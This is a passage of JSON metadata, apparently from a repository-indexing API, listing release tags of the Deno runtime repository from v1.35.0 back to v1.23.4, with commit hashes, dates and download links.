"published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/